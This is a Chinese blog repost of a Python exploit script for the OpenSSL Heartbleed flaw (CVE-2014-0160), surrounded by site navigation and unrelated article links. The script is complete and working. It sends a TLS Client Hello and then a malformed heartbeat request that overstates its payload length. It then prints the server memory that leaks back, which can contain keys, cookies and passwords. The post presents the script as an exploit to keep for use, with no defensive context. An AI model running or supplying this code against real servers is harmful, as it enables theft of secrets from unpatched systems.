博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【脚本程序】Openssl利用脚本
阅读量:4571 次
发布时间:2019-06-08

本文共 4686 字,大约阅读时间需要 15 分钟。

装系统了很多东西没有了,遇到了一openssl还不能读了,还费力的找了一会。这次收藏下吧。

  

1 #!/usr/bin/python  2   3 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)  4 # The author disclaims copyright to this source code.  5   6 import sys  7 import struct  8 import socket  9 import time 10 import select 11 import re 12 from optparse import OptionParser 13  14 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') 15 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') 16  17 def h2bin(x): 18     return x.replace(' ', '').replace('\n', '').decode('hex') 19  20 hello = h2bin(''' 21 16 03 02 00  dc 01 00 00 d8 03 02 53 22 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf 23 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00 24 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88 25 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c 26 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09 27 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44 28 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c 29 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11 30 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04 31 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19 32 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08 33 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13 34 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00 35 00 0f 00 01 01                                  36 ''') 37  38 hb = h2bin(''' 39 18 03 02 00 03 40 01 40 00 41 ''') 42  43 def hexdump(s): 44     for b in xrange(0, len(s), 16): 45         lin = [c for c in s[b : b + 16]] 46         hxdat = ' '.join('%02X' % ord(c) for c in lin) 47         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 48         print '  %04x: %-48s %s' % (b, hxdat, pdat) 49     print 50  51 def recvall(s, length, timeout=5): 52     endtime = time.time() + timeout 53     rdata = '' 54     remain = length 55     while remain > 0: 56         rtime = endtime - time.time() 57         if rtime < 0: 58             return None 59         r, w, e = select.select([s], [], [], 5) 60         if s in r: 61             data = s.recv(remain) 62             # EOF? 63             if not data: 64                 return None 65             rdata += data 66             remain -= len(data) 67     return rdata 68  69   70 def recvmsg(s): 71     hdr = recvall(s, 5) 72     if hdr is None: 73         print 'Unexpected EOF receiving record header - server closed connection' 74         return None, None, None 75     typ, ver, ln = struct.unpack('>BHH', hdr) 76     pay = recvall(s, ln, 10) 77     if pay is None: 78         print 'Unexpected EOF receiving record payload - server closed connection' 79         return None, None, None 80     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) 81     return typ, ver, pay 82  83 def hit_hb(s): 84     s.send(hb) 85     while True: 86         typ, ver, pay = recvmsg(s) 87         if typ is None: 88             print 'No heartbeat response received, server likely not vulnerable' 89             return False 90  91         if typ == 24: 92             print 'Received heartbeat response:' 93             hexdump(pay) 94             if len(pay) > 3: 95                 print 'WARNING: server returned more data than it should - server is vulnerable!' 96             else: 97                 print 'Server processed malformed heartbeat, but did not return any extra data.' 98             return True 99 100         if typ == 21:101             print 'Received alert:'102             hexdump(pay)103             print 'Server returned error, likely not vulnerable'104             return False105 106 def main():107     opts, args = options.parse_args()108     if len(args) < 1:109         options.print_help()110         return111 112     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)113     print 'Connecting...'114     sys.stdout.flush()115     s.connect((args[0], opts.port))116     print 'Sending Client Hello...'117     sys.stdout.flush()118     s.send(hello)119     print 'Waiting for Server Hello...'120     sys.stdout.flush()121     while True:122         typ, ver, pay = recvmsg(s)123         if typ == None:124             print 'Server closed connection without sending Server Hello.'125             return126         # Look for server hello done message.127         if typ == 22 and ord(pay[0]) == 0x0E:128             break129 130     print 'Sending heartbeat request...'131     sys.stdout.flush()132     s.send(hb)133     hit_hb(s)134 135 if __name__ == '__main__':136     main()

 

转载于:https://www.cnblogs.com/coffeesafe/p/4896131.html

你可能感兴趣的文章
VBA中Dictionary对象使用(Key,Value)
查看>>
Shell脚本中计算字符串长度的5种方法
查看>>
laravel 查询随机数据
查看>>
cocos2dx-3.2 笔记 - 点击事件
查看>>
VS2017简单使用
查看>>
[2015编程之美] 资格赛C
查看>>
步进电机驱动
查看>>
C++模板
查看>>
C#--正则匹配
查看>>
5.30 考试修改+总结
查看>>
BA-设计施工调试流程
查看>>
C#-CLR各版本特点
查看>>
css3背景透明文字不透明
查看>>
实验四
查看>>
C++学习--应用篇(Windows/Linux)(书籍推荐及分享)
查看>>
金山快盘有Linux版了
查看>>
Git tag 给当前分支打标签
查看>>
继承和组合(转)
查看>>
mssql sqlserver 取消数值四舍五入的方法分享
查看>>
[记录] JavaScript 中的事件分类
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-10-18 05:48:33   当前IP: 18.119.19.99   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我